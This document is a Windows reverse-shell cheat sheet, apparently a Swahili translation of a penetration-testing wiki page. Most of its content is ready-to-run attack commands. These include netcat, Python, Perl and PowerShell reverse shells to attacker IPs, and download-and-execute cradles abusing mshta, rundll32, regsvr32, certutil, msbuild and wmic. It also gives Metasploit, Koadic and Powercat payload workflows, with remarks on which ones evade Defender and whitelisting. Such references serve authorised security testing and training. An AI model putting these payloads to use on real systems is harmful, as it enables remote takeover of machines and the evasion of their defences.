Shells - Windows

Reading time: 15 minutes

Lolbas

Ukurasa lolbas-project.github.io ni wa Windows kama https://gtfobins.github.io/ ni wa linux.
Kwa wazi, hakuna faili za SUID au ruhusa za sudo katika Windows, lakini ni muhimu kujua jinsi baadhi ya binaries zinaweza kutumika (kuhujumiwa) kufanya aina fulani ya vitendo visivyotarajiwa kama kutekeleza msimbo wa bahati nasibu.

NC

nc.exe -e cmd.exe <Attacker_IP> <PORT>

NCAT

mhasiri

ncat.exe <Attacker_IP> <PORT>  -e "cmd.exe /c (cmd.exe  2>&1)"
#Encryption to bypass firewall
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe  2>&1)"

mshambuliaji

ncat -l <PORT>
#Encryption to bypass firewall
ncat -l <PORT eg.443> --ssl

SBD

sbd ni mbadala wa Netcat unaoweza kubebeka na salama. Inafanya kazi kwenye mifumo ya Unix kama na Win32. Ikiwa na vipengele kama vile usimbuaji mzito, utekelezaji wa programu, bandari za chanzo zinazoweza kubadilishwa, na kuunganishwa tena mara kwa mara, sbd inatoa suluhisho la kubadilika kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka kwa usambazaji wa Kali Linux linaweza kutumika kama mbadala wa kuaminika wa Netcat.

# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444


# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)

Python

#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Perl

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

OpenSSH

Mshambuliaji (Kali)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

Mtu aliyeathirika

#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile

Mchakato unaofanya wito wa mtandao: powershell.exe
Payload imeandikwa kwenye diski: HAPANA (angalau mahali popote ambapo ningeweza kupata kwa kutumia procmon ! )

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Mchakato unaofanya wito wa mtandao: svchost.exe
Malipo yaliyoandikwa kwenye diski: WebDAV client local cache

Mstari mmoja:

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Pata maelezo zaidi kuhusu Powershell Shells tofauti mwishoni mwa hati hii

Mshta

• Kutoka hapa

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

mshta http://webserver/payload.hta

mshta \\webdavserver\folder\payload.hta

Mfano wa hta-psh reverse shell (tumia hta kupakua na kutekeleza PS backdoor)

<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager hta

mfano wa hta

Kutoka hapa

<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

mshta - sct

Kutoka hapa

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Mshta - Metasploit

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit

Imegunduliwa na mlinzi

Rundll32

Mfano wa dll hello world

• Kutoka hapa

rundll32 \\webdavserver\folder\payload.dll,entrypoint

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Imegunduliwa na mlinzi

Rundll32 - sct

Kutoka hapa

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Rundll32 - Metasploit

use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0

Rundll32 - Koadic

use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();

Regsvr32

• Kutoka hapa

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Imegunduliwa na mlinzi

Regsvr32 -sct

Kutoka hapa

<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

Regsvr32 - Metasploit

use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll

Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager regsvr

Certutil

• Kutoka hapa

Pakua B64dll, ikode na uitekeleze.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

Pakua B64exe, ikode na uifanye kazi.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Imegunduliwa na mlinzi

Cscript/Wscript

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Cscript - Metasploit

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs

Imegunduliwa na mlinzi

PS-Bat

\\webdavserver\folder\batchfile.bat

Mchakato unaofanya wito wa mtandao: svchost.exe
Malipo yaliyoandikwa kwenye diski: WebDAV client local cache

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`

\\10.8.0.3\kali\shell.bat

Imegunduliwa na mlinzi

MSIExec

Mshambuliaji

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80

Mtu aliyeathirika:

victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi

Imepatikana

Wmic

• Kutoka hapa

wmic os get /format:"https://webserver/payload.xsl"

Example xsl file from here:

<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
</ms:script>
</stylesheet>

Haitambuliwi

Unaweza kupakua na kutekeleza kwa urahisi sana Koadic zombie ukitumia stager wmic

Msbuild

• Kutoka hapa

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Unaweza kutumia mbinu hii kupita vizuizi vya Application Whitelisting na vizuizi vya Powershell.exe. Kwa hivyo utaonyeshwa na PS shell.
Pakua hii na uifanye: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

Haitagundulika

CSC

Kusanya msimbo wa C# kwenye mashine ya mwathirika.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs

Unaweza kupakua shell ya msingi ya C# kutoka hapa: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Haijagundulika

Regasm/Regsvc

• Kutoka hapa

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Sijajaribu

https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182

Odbcconf

• Kutoka hapa

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Sijajaribu

https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2

Powershell Shells

PS-Nishang

https://github.com/samratashok/nishang

Katika folda ya Shells, kuna shell nyingi tofauti. Ili kupakua na kutekeleza Invoke-PowerShellTcp.ps1, fanya nakala ya script na ongeza mwishoni mwa faili:

Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444

Anza kuhudumia skripti kwenye seva ya wavuti na uitekeleze upande wa mwathirika:

powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"

Defender haitambui kama msimbo mbaya (bado, 3/04/2019).

TODO: Angalia nishang shells nyingine

PS-Powercat

https://github.com/besimorhino/powercat

Pakua, anzisha seva ya wavuti, anzisha msikilizaji, na uite upande wa mwathirika:

powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Defender haitambui kama msimbo mbaya (bado, 3/04/2019).

Chaguzi zingine zinazotolewa na powercat:

Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...

Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep

Empire

https://github.com/EmpireProject/Empire

Unda launcher ya powershell, ihifadhi kwenye faili na uipakue na kuitekeleze.

powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Imepatikana kama msimbo mbaya

MSF-Unicorn

https://github.com/trustedsec/unicorn

Unda toleo la powershell la backdoor ya metasploit ukitumia unicorn

python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443

Anza msfconsole na rasilimali iliyoundwa:

msfconsole -r unicorn.rc

Anza seva ya wavuti inayotoa faili powershell_attack.txt na uendeleze katika mwathirika:

powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"

Imepatikana kama msimbo mbaya

Zaidi

PS>Attack PS console yenye baadhi ya moduli za PS za kushambulia zilizopakiwa (cyphered)
https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9
WinPWN PS console yenye baadhi ya moduli za PS za kushambulia na ugunduzi wa proxy (IEX)

Marejeleo

• https://highon.coffee/blog/reverse-shell-cheat-sheet/
• https://gist.github.com/Arno0x
• https://github.com/GreatSCT/GreatSCT
• https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
• https://www.hackingarticles.in/koadic-com-command-control-framework/
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
• https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/